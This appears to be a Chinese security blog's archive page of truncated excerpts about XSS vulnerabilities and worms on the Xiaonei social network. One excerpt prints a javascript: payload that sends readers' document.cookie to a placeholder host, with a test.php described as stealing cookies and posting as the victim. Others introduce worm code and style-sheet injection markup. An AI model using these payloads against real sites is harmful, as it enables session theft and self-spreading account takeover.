# 鬼仔:打包了下那个swf和js,xiaonei_flash_xss_worm.7z 。
分析来源:知道安全(http://www.scanw.com/blog/)
威胁本质:
校内网的 JS函数playswf可以动态地创建一个flash player容器(<embed type=”application/x-shockwave-flash”></embed>),而创建的flash player容器错误地使用了allowScriptAccess属性,代码片段如下:
阅读全文 »
Tags: Flash,
XSS,
XSS Worm,
校内
作者:Flyh4t
校内网在发blog时对插入图片过滤不严格,存在xss漏洞
在发blog时将插入图片URL写为如下代码即可触发:
javascript:window.location.href='http://xxxxx/test.php?cookie='+document.cookie
test.php的作用是窃取cookie、伪造阅览者身份发一个blog、跳转到一个正常的日志,代码如下:
阅读全文 »
Tags: XSS,
校内,
漏洞,
跨站
——余弦函数( http://hi.baidu.com/ycosxhack )三更半夜原创
我知道校内网曾经爆发的那个蠕虫,那时候爆发这个相对来说容易,因为那时XSS没任何挑战,而AJAX蠕虫不是谁都可以写出来的,至少要有不错的 JavaScript编程能力。我是这两天才开始认真使用校内网的,使用前就发文声称要XSS^^,没想到几个小时的渗透,发现了校内网的过滤系统就是形同虚设。
下面详细讲解下这个渗透过程,技术讨论而已。其他邪恶的问题一概不回答。
一、先了解下面这些:
渗透点为校内网的涂鸦板,这个涂鸦板就像百度空间的“编辑CSS自定义模板”。如下截图: 阅读全文 »
Tags: XSS,
校内
from:恶魔傻蛋网络研究中心
呵呵….发现留这个东西实在没什么用处,就在这个群里首发吧.~~呵呵.希望能有对我们ncu的网络安全事业有点促进作用~~呵呵.
大家别去干坏事哦~~~
呵呵,自我感觉这个worm写的还不错.嘿嘿.~
大家学习参考之用,危害极大,如有人用于非法用途,概不负责.
存在漏洞页面:特别好友的描述那里,没有做任何过滤~
=============================================================
以下是worm代码
=============================================================
var url = ""; //本段代码的地址如:http://www.emodd.com/other/1.txt
阅读全文 »
Tags: Worm,
XSS,
校内
文章作者:langouster
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
在一次查看校内网网页源程序的时候无意间发现一个校内蠕虫,开始还以为是我的网页有问题,就随便打开几个人的页面查看,发现许多人的页面上也有这段代码。
阅读全文 »
Tags: Worm,
校内
来源:梦之光芒
本来不想提校内网的XSS来着,因为太多,没有提的必要。
不过最近室友争着问我为什么有的人的空间访问量已经达到了几千万(在百度这里相对比较容易,因为文章的访问也算在内。而校内网的不算,所以几百万算是天文数字了),而且数字还在以每秒钟若干的数据增长!所以这里也给大家看下。
懂XSS的好友知道,这里便是利用上XSS了。看了看他们的代码(涂鸦板),大致如下:
<link href="A308676992321RAT.wma" type="text/css" rel="stylesheet" />
<div class=addJs>A247165747728HOR.wma</div>
其中A308676992321RAT.wma里的代码如下:
阅读全文 »
Tags: XSS,
校内